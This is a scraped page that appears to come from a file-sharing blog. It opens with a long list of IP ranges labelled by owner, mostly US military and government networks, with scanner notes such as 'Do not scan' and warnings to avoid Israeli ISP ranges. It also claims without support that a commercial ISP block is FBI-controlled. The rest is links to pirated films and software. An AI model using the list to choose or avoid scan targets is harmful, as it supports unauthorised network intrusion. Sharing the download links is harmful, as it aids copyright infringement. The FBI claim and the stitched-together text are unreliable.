164.94.*.* Navy Personel Research
164.158.0.0 Naval Surface Warfare Center
164.105.*.* Commander, Naval Reserve Force
164.112.*.* Queensland Police Service
164.117.*.* Defense Systems Support ORganization
164.202.0.0 - 164.206.0.0 DOD
164.210.0.0 - 164.212.0.0 DOD
164.207.0.0 - 164.209.0.0 SSG/SWSN (MIL)
164.214.*.* Defense Mapping Service
164.216.*.* Defense FInance Service
164.217.0.0 Institute for Defense Analyses
164.218.0.0 Bureau of Naval Personnel
164.219.0.0 HQ USAFE WARRIOR PREPARATION CENTER
164.220.0.0 - 164.220.255.255 NIMIP/TIP/NEWNET
164.221.0.0 - 164.221.255.255 Information Technology
164.223.0.0 Naval Undersea Warfare Center
164.224.0.0 Secretary of the Navy
164.225.0.0 U.S. Army Intelligence and Security Command
164.226.0.0 Naval Exchange Service Command
164.227.0.0 Naval Surface Warfare Center, Crane Division
164.228.0.0 USCINCPAC J21T
164.229.0.0 NCTS-NOLA
164.230.0.0 Naval Aviation Depot
164.231.0.0 Military Sealift Command
164.232.0.0 - 164.232.255.255 United States Southern Command
164.233.0.0 Defense Information Systems Agency
164.235.0.0 DOD
164.236.0.0 USSPACE

RANGE 167
167.44.0.0 Government Telecommunications Agency

RANGE 168
168.68.0.0 USDA Office of Operations
168.85.0.0 Fort Sanders Alliance
168.102.0.0 Indiana Purdue Fort Wayne

RANGE 169
169.252.0.0 - 169.253.0.0 U.S. Department of State

RANGE 194

RANGE 195
195.10.* Various - Do not scan

RANGE 199
199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA

RANGE 203
203.59.0.0 - 203.59.255.255 Perth Australia iiNET

RANGE 204
204.34.0.0 - 204.34.15.0 IPC JAPAN
204.34.0.0 - 204.37.255.0 DOD Network Information Center
204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery
204.34.32.0 - 204.34.63.0 USACOM
204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE
204.34.128.0 DISA-Eucom / BBN-STD, Inc.
204.34.129.0 Defense Technical Information Center
204.34.130.0 GSI
204.34.131.0 NSA NAPLES ITALY
204.34.132.0 NAVSTA ROTA SPAIN
204.34.133.0 NAS SIGONELLA ITALY
204.34.134.0 Naval Air Warfare Center Aircraft Division
204.34.135.0 GSI
204.34.136.0 Naval Undersea Warfare Center USRD - Orlando
204.34.137.0 Joint Spectrum Center
204.34.138.0 GSI
204.34.139.0 HQ, JFMO Korea, Headquarters
204.34.140.0 DISA D75
204.34.141.0 U. S. Naval Air Facility, Atsugi Japan
204.34.142.0 Naval Enlisted Personnel Management Center
204.34.143.0 Afloat Training Group Pacific
204.34.144.0 HQ Special Operations Command - Europe
204.34.145.0 Commander Naval Base Pearl Harbor
204.34.147.0 NAVSEA Information Management Improvement Program
204.34.148.0 Q112
204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures
204.34.150.0 Resource Consultants, Inc.
204.34.151.0 Personnel Support Activity, San Diego
204.34.152.0 NAVAL AIR FACILITY, ADAK
204.34.153.0 NAVSEA Logistics Command Detachment
204.34.154.0 PEARL HARBOR NAVAL SHIPYARD
204.34.155.0 PEARL HARBOR NAVAL SHIPYARD
204.34.156.0 Defense Photography School
204.34.157.0 - 204.34.160.0 Defense Information School
204.34.161.0 Naval Air Systems Command
204.34.162.0 Puget Sound Naval Shipyard
204.34.163.0 Joint Precision Strike Demonstration
204.34.164.0 Naval Pacific Meteorology and Ocean
204.34.165.0 Joint Precision Strike Demonstration
204.34.167.0 USAF
204.34.168.0 Commander
204.34.169.0 Naval Air Warfare Center
204.34.170.0 Naval Air Systems Command
204.34.171.0 NAVSTA SUPPLY DEPARTMENT
204.34.173.0 SUBMEPP Activity
204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN
204.34.176.0 DISA-PAC,IPC-GUAM
204.34.177.0 Satellite Production Test Center
204.34.181.0 940 Air Refueling Wing
204.34.182.0 Defense Megacenter Warner Robins
204.34.183.0 GCCS Support Facility
204.34.184.0 Nav Air Tech Serv Facility-Detachment
204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA
204.34.186.0 Defense Logistics Agency - Europe
204.34.187.0 NAVMASSO
204.34.188.0 Commander-In-Chief, US Pacific Fleet
204.34.189.0 Defense MegaCenter - St Louis
204.34.190.0 NAVMASSO
204.34.192.0 HQ SOCEUR
204.34.193.0 Second Marine Expeditionary Force
204.34.194.0 Second Marine Expeditionary Force
204.34.195.0 Second Marine Expeditionary Force
204.34.196.0 NAVCOMTELSTAWASHDC
204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.198.0 Naval Observatory Detachment, Colorado
204.34.199.0 NAVILCODETMECH
204.34.200.0 Navy Environmental Preventive Medicine
204.34.201.0 Port Hueneme Division, Naval Surf
204.34.202.0 Naval Facilities Engineering Housing
204.34.203.0 NAVSEA Logistics Command Detachment
204.34.204.0 Naval Air Warfare Center
204.34.205.0 Portsmouth Naval Shipyard
204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific
204.34.211.0 USAF Academy
204.34.212.0 3rd Combat Service Support
204.34.213.0 1st Radio Battalion
204.34.214.0 OASD (Health Affairs)
204.34.215.0 Second Marine Expeditionary Force
204.34.216.0 1st Marine Air Wing
204.34.217.0 SA-ALC/LTE
204.34.218.0 3rd Marine
204.34.219.0 Communications and Electronics
204.34.220.0 G-6 Operations
204.34.221.0 G-6 Operations
204.34.222.0 G-6 Operations
204.34.223.0 G-6 Operations
204.34.224.0 G-6 Operations
204.34.225.0 Joint Interoperability Test Command
204.34.226.0 NAVMASSO
204.34.227.0 NAVMASSO
204.34.228.0 - 204.34.228.255 Field Command Defense Nuclear Agency
204.34.229.0 Naval Space Command
204.34.230.0 Naval Pacific Meteorology and Oceanography
204.34.232.0 Military Family Housing
204.34.233.0 - 204.34.233.255 Navy Material Transportation Office
204.34.234.0 NAVMASSO
204.34.235.0 Defense Finance and Accounting Service
204.34.237.0 European Stars and Stripes
204.34.238.0 Pacific Stars and Stripes
204.34.239.0 PUGET SOUND NAVAL SHIPYARD
204.34.240.0 Nval Station, Guantanamo Bay
204.34.242.0 COMNAVSURFPAC
204.34.243.0 NAVMASSO
204.34.244.0 Amphibious Force, Seventh Fleet, U. S. Navy
204.34.245.0 USAF SpaceCommand
204.34.246.0 USAF
204.34.247.0 U.S. Army Special Operations Command
204.34.248.0 FLEET COMBAT TRAINING CENTER ATLA
204.34.249.0 Naval Aviation Depot North Island
204.34.250.0 NAVMASSO
204.34.251.0 NAVSEA Log Command Detachment Pacific
204.34.252.0 Command Special Boat Squadron One
204.34.253.0 AFPCA/GNNN
204.34.254.0 Navy Environmental Preventive Medicine

RANGE 205
205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
205.96.* - 205.103.*

RANGE 207
207.30.* Sprint/United Telephone of Florida

All the below are FBI controlled Linux servers & IPs/IP-Ranges

207.60.0.0 - 207.60.255.0 The Internet Access Company
207.60.2.128 - 207.60.2.255 Abacus Technology
207.60.3.0 - 207.60.3.127 Mass Electric Construction Co.
207.60.3.128 - 207.60.3.255 Peabody Proberties Inc
207.60.4.0 - 207.60.4.127 Northern Electronics
207.60.4.128 - 207.60.4.255 Posternak, Blankstein & Lund
207.60.5.64 - 207.60.5.127 Woodard & Curran
207.60.5.192 - 207.60.5.255 On Line Services
207.60.6.0 - 207.60.6.63 The 400 Group
207.60.6.64 - 207.60.6.127 RD Hunter and Company
207.60.6.128 - 207.60.6.191 Louis Berger and Associates
207.60.6.192 - 207.60.6.255 Ross-Simons
207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank
207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee
207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc
207.60.8.0 - 207.60.8.255 Sippican
207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co
207.60.9.32 - 207.60.9.63 Escher Group Ltd
207.60.9.64 - 207.60.9.95 West Suburban Elder
207.60.9.96 - 207.60.9.127 Central Bank
207.60.9.128 - 207.60.9.159 Danick Systems
207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO
207.60.9.192 - 207.60.9.223 BSCC
207.60.13.16 - 207.60.13.23 Patrons Insurance Group
207.60.13.40 - 207.60.13.47 Athera Technologies
207.60.13.48 - 207.60.13.55 Service Edge Partners Inc
207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League
207.60.13.64 - 207.60.13.71 SierraCom
207.60.13.72 - 207.60.13.79 AI/ FOCS
207.60.13.80 - 207.60.13.87 Extreme soft
207.60.13.96 - 207.60.13.103 Eaton Seo Corp
207.60.13.112 - 207.60.13.119 C. White
207.60.13.120 - 207.60.13.127 Athera
207.60.13.128 - 207.60.13.135 Entropic Systems, INC
207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates
207.60.13.160 - 207.60.13.167 Jamestown Distribution
207.60.13.168 - 207.60.13.175 C&M Computers
207.60.13.176 - 207.60.13.183 ABC Used Auto Parts
207.60.13.184 - 207.60.13.191 Tomas Weldon
207.60.13.192 - 207.60.13.199 Tage Inns
207.60.13.200 - 207.60.13.207 Control Module Inc
207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems
207.60.13.216 - 207.60.13.223 Eastern Bearings
207.60.13.224 - 207.60.13.231 North Shore Data Services
207.60.13.232 - 207.60.13.239 Mas New Hampshire
207.60.14.0 - 207.60.14.255 J. A. Webster
207.60.15.0 - 207.60.15.127 Trilogic
207.60.16.0 - 207.60.16.255 Area 54
207.60.18.0 - 207.60.18.63 Vested Development Inc
207.60.18.64 - 207.60.18.127 Conventures
207.60.21.0 - 207.60.21.255 Don Law Company
207.60.22.0 - 207.60.22.255 Advanced Microsensors
207.60.28.0 - 207.60.28.63 Applied Business Center
207.60.28.64 - 207.60.28.127 Color and Design Exchange
207.60.36.8 - 207.60.36.15 Shaun McCusker
207.60.36.16 - 207.60.36.23 Town of Framingham
207.60.36.24 - 207.60.36.31 AB Software
207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc
207.60.36.40 - 207.60.36.47 Next Ticketing
207.60.36.48 - 207.60.36.55 Dulsi
207.60.36.56 - 207.60.36.63 The Internet Access Company
207.60.36.64 - 207.60.36.71 Maguire Group
207.60.36.72 - 207.60.36.79 Cogenex
207.60.36.88 - 207.60.36.95 AKNDC
207.60.36.96 - 207.60.36.103 McGovern election commitee
207.60.36.104 - 207.60.36.111 Digital Equipment Corp
207.60.36.112 - 207.60.36.119 PTR - Precision Technologies
207.60.36.120 - 207.60.36.127 Extech
207.60.36.128 - 207.60.36.135 Manfreddi Architects
207.60.36.144 - 207.60.36.151 Parent Naffah
207.60.36.152 - 207.60.36.159 Darling Dolls Inc
207.60.36.160 - 207.60.36.167 Wright Communications
207.60.36.168 - 207.60.36.175 Principle Software
207.60.36.176 - 207.60.36.183 Chris Pet Store
207.60.36.184 - 207.60.36.191 Fifteen Lilies
207.60.36.192 - 207.60.36.199 All-Com Technologies
207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A.
207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc
207.60.37.64 - 207.60.37.95 Apple and Eve Distributors
207.60.37.96 - 207.60.37.127 Nelson Copy Supply
207.60.37.128 - 207.60.37.159 Boston Optical Fiber
207.60.37.192 - 207.60.37.223 Fantasia&Company
207.60.41.0 - 207.60.41.255 Infoactive
207.60.48.0 - 207.60.48.255 Curry College
207.60.62.32 - 207.60.62.63 Alternate Power Source
207.60.62.64 - 207.60.62.95 Keystone Howley-White
207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD
207.60.62.160 - 207.60.62.191 County Supply
207.60.62.192 - 207.60.62.223 NH Board of Nursing
207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies
207.60.64.64 - 207.60.64.127 Phytera
207.60.66.0 - 207.60.66.15 The Network Connection
207.60.66.16 - 207.60.66.31 Young Refrigeration
207.60.66.32 - 207.60.66.47 Vision Appraisal Technology
207.60.66.48 - 207.60.66.63 EffNet Inc
207.60.66.64 - 207.60.66.79 Entropic Systems Inc
207.60.66.80 - 207.60.66.95 Finley Properties
207.60.66.96 - 207.60.66.111 Nancy Plowman Associates
207.60.66.112 - 207.60.66.127 Northeast Financial Strategies
207.60.66.128 - 207.60.66.143 Textnology Corp
207.60.66.144 - 207.60.66.159 Groton Neochem LLC
207.60.66.160 - 207.60.66.175 Tab Computers
207.60.66.176 - 207.60.66.191 Patrons Insurance
207.60.66.192 - 207.60.66.207 Chair City Web
207.60.66.208 - 207.60.66.223 Radex, Inc.
207.60.66.224 - 207.60.66.239 Robert Austein
207.60.66.240 - 207.60.66.255 Hologic Inc.
207.60.71.64 - 207.60.71.127 K-Tech International Inc.
207.60.71.128 - 207.60.71.191 Pan Communications
207.60.71.192 - 207.60.71.255 New England College of Finance
207.60.75.128 - 207.60.75.255 Absolve Technology
207.60.78.0 - 207.60.78.127 Extech
207.60.78.128 - 207.60.78.255 The Insight Group
207.60.83.0 - 207.60.83.255 JLM Technologies
207.60.84.0 - 207.60.84.255 Strategic Solutions
207.60.94.0 - 207.60.94.15 McWorks
207.60.94.32 - 207.60.94.47 Rooney RealEstate
207.60.94.48 - 207.60.94.63 Joseph Limo Service
207.60.94.64 - 207.60.94.79 The Portico Group
207.60.94.80 - 207.60.94.95 Event Travel Management Inc
207.60.94.96 - 207.60.94.111 Intellitech International
207.60.94.128 - 207.60.94.143 Orion Partners
207.60.94.144 - 207.60.94.159 Rainbow Software Solution
207.60.94.160 - 207.60.94.175 Grason Stadler Inc
207.60.94.192 - 207.60.94.207 Donnegan System
207.60.95.1 - 207.60.95.255 The Iprax Corp
207.60.102.0 - 207.60.102.63 Coporate IT
207.60.102.64 - 207.60.102.127 Putnam Technologies
207.60.102.128 - 207.60.102.191 Sycamore Networks
207.60.102.192 - 207.60.102.255 Bostek
2?7.6?.10?.128 - 207.60.103.255 Louis Berger and Associates
207.60.104.128 - 207.60.104.191 Hanson Data Systems
207.60.106.128 - 207.60.106.255 Giganet Inc.
207.60.107.0 - 207.60.107.255 Roll Systems
207.60.108.8 - 207.60.108.15 InternetQA
207.60.111.0 - 207.60.111.31 Reading Cooperative Bank
207.60.111.32 - 207.60.111.63 Edco collaborative
207.60.111.64 - 207.60.111.95 DTC Communications Inc
207.60.111.96 - 207.60.111.127 Mike Line
207.60.111.128 - 207.60.111.159 The Steppingstone Foundation
207.60.111.160 - 207.60.111.191 Caton Connector
207.60.111.192 - 207.60.111.223 Refron
207.60.111.224 - 207.60.111.255 Dolabany Comm Group
207.60.112.0 - 207.60.112.255 The CCS Companies
207.60.116.0 - 207.60.116.255 Continental PET Technologies
207.60.122.16 - 207.60.122.23 Corey & Company Designers Inc
207.60.122.24 - 207.60.122.31 SAIC
207.60.122.32 - 207.60.122.39 Netserve Entertainment Group
207.60.122.40 - 207.60.122.47 Avici Systems Inc
207.60.122.48 - 207.60.122.55 Webrdwne
207.60.122.56 - 207.60.122.63 Reality and Wonder
207.60.122.64 - 207.60.122.71 Nishan Desilva
207.60.122.72 - 207.60.122.79 NemaSoft Inc
207.60.122.80 - 207.60.122.87 Patrick Murphy
207.60.122.88 - 207.60.122.95 Corey and Company
207.60.122.96 - 207.60.122.103 Ames Textile Corp
207.60.122.104 - 207.60.122.111 Publicom
207.60.127.0 - Northstar Technologies
207.60.128.0 - 207.60.128.255 Northstar Technologies
207.60.129.0 - 207.60.129.255 Sanga Corp
207.60.129.64 - 207.60.129.127 Fired Up Network
207.60.129.128 - 207.60.129.191 Integrated Data Solutions
207.60.129.192 - 207.60.129.255 Metanext
207.61.* WorldLinx Telecommunications, Inc., Canada
207.120.* BBN Planet, MA

RANGE 208
208.240.xxx.xxx

RANGE 209
209.35.* Interland, Inc., GA

RANGE 212
212.56.107.22
212.143 *** israelis isp's!! dont try those ranges!!
212.149.*** israelis isp's!! dont try those ranges!!
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.33.56
212.159.40.211
212.159.41.173
212.179.*** israelis isp's!! dont try those ranges!!
212.208.0.12.*** israelis isp's!! dont try those ranges!!

RANGE 213
213.8.***.*** israelis isp's!! dont try those ranges!!

RANGE 216
216.25.* 216.94.***.*** 216.247.* 216.248.*.* 217
217.6.* Do not scan

ĐỌC THÊM !!!!

Please do not spam comment.
We need your useful posts, not spam posts.
If you use any resources from our Blog, please credit me. ex: "from FreeFirst"
You can share our sources to your friends, but, do not make them to pay their money for that.
If you have useful softwares/movie/etc... please mail us at : stunvn@gmail.com or you can become a poster !
For our members, posters : Use our sources, do not leech from the others sites.
Good luck to you !

ĐỌC THÊM !!!!

GOM Player 2.1.9.3754 Labels: Softwares | 0 comments

GOM is a FREE media player with popular audio & video codecs built-in.
No need to install codecs separately! Try one of your broken AVI files or one of the files that is being downloaded with GOM.

GOM Player supports most popular codecs (AVI, DAT, MPEG, DivX plus many more) with its own embedded codec system that you won't have to look for appropriate codecs everytime you can't play a certain video format. For those codecs that require a license that cannot be distributed, GOM will automatically lead you to an open-source codec web-site.

Watch video files while you are downloading them! GOM has a registered patent for playing broken AVI files and files that are still being downloaded. So try one of your broken AVI files or one that you are downloading right now. You'll find it amazing!

GOM supports a lot of advanced features for advanced users. You can customize the player by creating your own skin, setting toggle keys, VMR modes, detailed resolution among others. It also provides features such as an overlay mixer, real-time index rebuilding for AVI files, unicode support, key frame based RW/FF and many more!

Download

http://www.mediafire.com/?gtzzhjmzcg9

ĐỌC THÊM !!!!

uTorrent is an efficient and feature rich BitTorrent client for Windows sporting a very small footprint. It was designed to use as little cpu, memory and space as possible while offering all the functionality expected from advanced clients.

* Multiple simultaneous downloads
* Configurable bandwidth scheduler
* Global and per-torrent speed limiting
* Quick-resumes interrupted transfers
* RSS Downloader
* Trackerless support (Mainline DHT)

Download:

http://www.mediafire.com/?9cnldz3mm1w

ĐỌC THÊM !!!!

Alien 4 Resurrection (1997)
About this file:

File Category: Movies
File Type: RapidShare Direct Link(s)
Number of Parts: 16
Released: 2007-09-25
Downloads: 1241
File size: 1401.94 MB
Password: n/a

Download:

http://rapidshare.com/files/52165466/alien.4.resurrection.dvdrip.part01.rar
http://rapidshare.com/files/52165807/alien.4.resurrection.dvdrip.part02.rar
http://rapidshare.com/files/52166118/alien.4.resurrection.dvdrip.part03.rar
http://rapidshare.com/files/52166416/alien.4.resurrection.dvdrip.part04.rar
http://rapidshare.com/files/52166761/alien.4.resurrection.dvdrip.part05.rar
http://rapidshare.com/files/52167057/alien.4.resurrection.dvdrip.part06.rar
http://rapidshare.com/files/52167301/alien.4.resurrection.dvdrip.part07.rar
http://rapidshare.com/files/52167608/alien.4.resurrection.dvdrip.part08.rar
http://rapidshare.com/files/52167902/alien.4.resurrection.dvdrip.part09.rar
http://rapidshare.com/files/52168540/alien.4.resurrection.dvdrip.part10.rar
http://rapidshare.com/files/52168878/alien.4.resurrection.dvdrip.part11.rar
http://rapidshare.com/files/52169162/alien.4.resurrection.dvdrip.part12.rar
http://rapidshare.com/files/52169444/alien.4.resurrection.dvdrip.part13.rar
http://rapidshare.com/files/52169729/alien.4.resurrection.dvdrip.part14.rar
http://rapidshare.com/files/52170084/alien.4.resurrection.dvdrip.part15.rar
http://rapidshare.com/files/52170132/alien.4.resurrection.dvdrip.part16.rar

ĐỌC THÊM !!!!

Aliens 3 (1992)
About this file:

File Category: Movies
File Type: RapidShare Direct Link(s)
Number of Parts: 16
Released: 2007-09-25
Downloads: 986
File size: 1402.07 MB
Password: n/a

Download

http://rapidshare.com/files/52160692/alien.3.dvdrip.part01.rar
http://rapidshare.com/files/52160969/alien.3.dvdrip.part02.rar
http://rapidshare.com/files/52161338/alien.3.dvdrip.part03.rar
http://rapidshare.com/files/52161658/alien.3.dvdrip.part04.rar
http://rapidshare.com/files/52161989/alien.3.dvdrip.part05.rar
http://rapidshare.com/files/52162284/alien.3.dvdrip.part06.rar
http://rapidshare.com/files/52162576/alien.3.dvdrip.part07.rar
http://rapidshare.com/files/52162889/alien.3.dvdrip.part08.rar
http://rapidshare.com/files/52163277/alien.3.dvdrip.part09.rar
http://rapidshare.com/files/52163582/alien.3.dvdrip.part10.rar
http://rapidshare.com/files/52163888/alien.3.dvdrip.part11.rar
http://rapidshare.com/files/52164191/alien.3.dvdrip.part12.rar
http://rapidshare.com/files/52164480/alien.3.dvdrip.part13.rar
http://rapidshare.com/files/52164812/alien.3.dvdrip.part14.rar
http://rapidshare.com/files/52165095/alien.3.dvdrip.part15.rar
http://rapidshare.com/files/52165173/alien.3.dvdrip.part16.rar

ĐỌC THÊM !!!!

About this file:

File Category: Movies
File Type: RapidShare Direct Link(s)
Number of Parts: 16
Released: 2007-09-04
Downloads: 1515
File size: 1443.04 MB
Password: n/a

Download :

http://rapidshare.com/files/52155353/aliens.dvdrip.part01.rar
http://rapidshare.com/files/52155890/aliens.dvdrip.part02.rar
http://rapidshare.com/files/52156351/aliens.dvdrip.part03.rar
http://rapidshare.com/files/52156684/aliens.dvdrip.part04.rar
http://rapidshare.com/files/52156977/aliens.dvdrip.part05.rar
http://rapidshare.com/files/52157316/aliens.dvdrip.part06.rar
http://rapidshare.com/files/52157639/aliens.dvdrip.part07.rar
http://rapidshare.com/files/52157978/aliens.dvdrip.part08.rar
http://rapidshare.com/files/52158342/aliens.dvdrip.part09.rar
http://rapidshare.com/files/52158673/aliens.dvdrip.part10.rar
http://rapidshare.com/files/52158998/aliens.dvdrip.part11.rar
http://rapidshare.com/files/52159360/aliens.dvdrip.part12.rar
http://rapidshare.com/files/52159701/aliens.dvdrip.part13.rar
http://rapidshare.com/files/52160020/aliens.dvdrip.part14.rar
http://rapidshare.com/files/52160302/aliens.dvdrip.part15.rar
http://rapidshare.com/files/52160369/aliens.dvdrip.part16.rar

ĐỌC THÊM !!!!

Alien 1979
About this file:

File Category: Movies
File Type: RapidShare Direct Link(s)
Number of Parts: 8
Released: 2008-02-29
Downloads: 178
File size: 683.66 MB
Password: n/a

Download :

http://rapidshare.com/files/95673585/alien_1979.part1.rar
http://rapidshare.com/files/95677689/alien_1979.part2.rar
http://rapidshare.com/files/95681515/alien_1979.part3.rar
http://rapidshare.com/files/95685210/alien_1979.part4.rar
http://rapidshare.com/files/95689671/alien_1979.part5.rar
http://rapidshare.com/files/95693649/alien_1979.part6.rar
http://rapidshare.com/files/95698655/alien_1979.part7.rar
http://rapidshare.com/files/95699273/alien_1979.part8.rar

ĐỌC THÊM !!!!

Perfect Uninstaller is a better and easier way for you to completely uninstall any unwanted application that standard Windows Add/Remove Program can't remove.

Have you ever been bothered with software applications that can't be uninstalled by the standard Windows Add/Remove Programs? You are in the right place!

What Perfect Uninstaller can do for you?
• Uninstall / remove any unwanted application in your PC
• Forcibly remove unwanted programs that cannot be uninstalled completely from "Windows Add or Remove Programs" control panel applet.
• Clear registry entries and drivers that the applications left over
• Show detailed information of a certain application installed in your computer
• Completely remove Adobe Reader, McAfee, Aol Toolbar, AVG Anti-Virus, Norton 2006/2007 and much more difficult to completely uninstall applications! Start your free trial now!

With Perfect Uninstaller, you can uninstall any unwanted applications in your system easier and faster. The standard Add /Remove Program can not often completely uninstall all applications and broken registry keys.Unlike your own PC Add/Remove Program , Perfect Uninstall can not only uninstall the applications , but also clean the registry files left over themselves. It will protect your PC from corrupted registry errors , improving your PC performance and speed !

Features And Benefits::

• Faster than the standard removal applet that comes with Windows.
• Provide different ways of application view to accord with your use habit: by Icons, by List, by Details.
• Remove programs that could not be removed by Add/Remove program.
• Completely clean the empty / corrupted registry entries that a certain application left over.
• Protect your registry from empty / corrupted errors and improve your PC performance.
• Forcibly remove hidden application installed in your system.
• Fast point to the folder where application installed..
• Check details of a certain program installed in your computer to decide whether to uninstall it or not.
• Easy of use and friendly user interface.
• Show details about currently installed applications.

Download :

http://www.mediafire.com/?xxhcha3lmp5

ĐỌC THÊM !!!!

Clean MemXP is a system utility for watching the current state of the system such as CPU usage, RAM and Virtual RAM availability, Disks, Processes, Network Monitoring (Processes accessing Internet, Network Traffic/Speed), Services, StartUp Programs. Clean MemXP can optimize system performance by defraging physical system memory.

Features:

* Watch CPU Usage (Support 4 CPU cores).
* Watch RAM and Virtual Memory Availability. Defrag Physical Memory when Memory reaches a limit.
(Option to show Free RAM and CPU usage in an icon to System Tray, in graphic and numeric mode).
* Show information for all system disks and drives.
* Watch Active Processes and Programs (Show detailed information about Modules and Registry Keys used by each Process).
* Watch Network Bandwidth Traffic (Support all Network types e.g Internet(ADSL)/Ethernet/Wireless Speed and Traffic).
* Watch Processes accessing Internet (TCP Protocol).
* Manage Windows Services (Start, Stop, Pause, Restart, Remove, Change StartMode).
* StartUp Manager. (Manage Programs that are automatically executed when windows start.)
* Program Launcher. Easily run your Favorites Programs and open your Files from System Tray.
* Show and explore Special Folders of Windows.
* Access hidden commands of Windows, like hide/show desktop, taskbar, enable/disable Start button .
* Run installed Screen Savers, enable/disable Screen Saver.
* Change Screen resolution.
* Empty Recycle Bin, Clean Recent Documents, Run Menu Commands, Search Files, Internet Explorer typed URL's.
* Access Control Panel items.
* Lock PC.
* Easy access from an icon to System Tray.
* Hot Keys for defraging RAM and appear Main Window Program.
Clean MemXP can be translated into all languages.
Clean MemXP supports skins. Choose between 20 skins.

Download:

http://www.mediafire.com/?hi9ffwyxjm1

ĐỌC THÊM !!!!

Password Safe is an Open Source (free) tool that allows you to have a different password for all the different programs and websites that you deal with, without actually having to remember all those usernames and passwords.

Password Safe runs on PCs under Windows (95/98/NT/2000/XP). An older (bu